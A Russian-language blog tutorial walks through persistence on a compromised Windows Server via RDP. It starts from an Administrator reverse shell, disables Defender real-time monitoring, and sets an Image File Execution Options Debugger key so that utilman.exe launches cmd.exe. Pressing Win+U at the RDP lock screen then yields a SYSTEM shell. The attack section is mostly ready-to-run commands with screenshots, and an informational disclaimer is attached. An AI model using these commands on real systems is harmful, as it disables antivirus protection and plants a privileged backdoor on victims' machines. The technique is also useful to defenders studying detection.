Сохранение через rdp

Время на прочтение

Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!

Привет! Сегодня хотелось бы рассмотреть стандартный, но необычный способ закрепления в системе через RDP, используя utilman.exe.

Представим следующую ситуацию: нам удалось получить reverse shell от целевого хоста. Безусловно, нам необходим backdoor для обеспечения постоянного доступа. В процессе сканирования мы узнаем об открытом 3389 порте. И как нам быть?

Немного теории

RDP (Remote Desktop Protocol) — это протокол для удаленного подключения к компьютеру или серверу с ОС Windows. С его помощью пользователи могут подключиться к удаленной машине и взаимодействовать с ее рабочим столом так, как если бы они физически находились перед ней. Чаще всего служба RDP используется для администрирования серверов, технической поддержки пользователей и удаленной работы.

Utilman.exe — это служебная программа Windows, которая служит для запуска специальных возможностей на экране блокировки (экранный диктор, экранная клавиатура, лупа и т. п.).

Реестр Windows – иерархически построенная база данных параметров и настроек в большинстве операционных систем Microsoft Windows. Реестр содержит информацию и настройки для аппаратного обеспечения, программного обеспечения, профилей пользователей, предустановки.

Информация о жертве

Сразу хотелось бы отметить, что целевой хост имеет следующую ОС:

Сохранение через rdp

Ключевой особенностью систем Windows Server является отключенное по умолчанию свойство “Tamper Protection”, которое обеспечивает дополнительную защиту от изменений ключевых функций безопасности, включая ограничение изменений, которые не вносятся непосредственно через приложение. Другими словами, запрещает другим вмешиваться в важные функции безопасности системы (запрещает изменение реестра).

Если данная функция включена, то отключить ее можно разными методами, например: https://theitbros.com/managing-windows-defender-using-powershell/#:~:text=Tamper%20Protection%20is%20enabled%20in,action%20at%20the%20UAC%20prompt

Также обязательным условием является выключенный параметр “Require computers to use Network Level Authentication to connect”, который запрещает подключаться по RDP без конкретной УЗ. Иными словами, запрет на попадание на экран блокировки

:/>  Как открыть и использовать ms config в windows 10
Сохранение через rdp

Отключение функции “Require computers to use Network Level Authentication to connect”.

Практический пример

Допустим, мы каким-то чудом смоги получить обратную оболочку от имени Администратора хоста:

Сохранение через rdp

Давайте проверим состояние активности антивируса (общий способ):

sc query WinDefend

Сохранение через rdp

Мы видим параметр “NOT_STOPABLE”, который говорит нам о том, что защита в реальном времени активна. Выключаем её:

powershell -command "Set-MpPreference -DisableRealtimeMonitoring $true"

и опять проверим состояние антивируса:

Сохранение через rdp

Также можно проверить другим способом:

powershell -command "(Get-MpPreference).DisableRealtimeMonitoring"

Если эта команда возвращает значение False, то реальный мониторинг активен. Если True, то выключен.

Сохранение через rdp

Действительно, он выключен. Теперь, когда приготовления закончены, перейдем к закреплению:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
Сохранение через rdp

Следующий шаг несет в себе возможную потерю backdoor’a.

Теперь вернем Defender в исходное состояние:

powershell -command "Set-MpPreference -DisableRealtimeMonitoring $false"

и сразу проверим:

powershell -command "(Get-MpPreference).DisableRealtimeMonitoring"

Сохранение через rdp

Прекращаем взаимодействие с хостом через обратную оболочку и подключаемся через rdesktop:
rdesktop ip

Сохранение через rdp

При первом подключении принимаем сертификаты

Сохранение через rdp

Теперь нам осталось нажать на значок справа внизу или комбинацию клавиш Win+U:

Сохранение через rdp

Успех! Теперь у нас есть backdoor от имени системы.

Кстати, вы заметили, что мы повысили свои права от Администратора до системы?)

Но почему это так работает?

Если кратко, то некоторые сервисы, службы и т.д. работают в системе с наивысшими правами. В нашем случае, utilman.exe. Изменив в реестре исполняемый файл на cmd.exe, система запускает его, опять же, с наивысшими правами (nt authority\ system)

Видео демонстрация атаки

Оставьте комментарий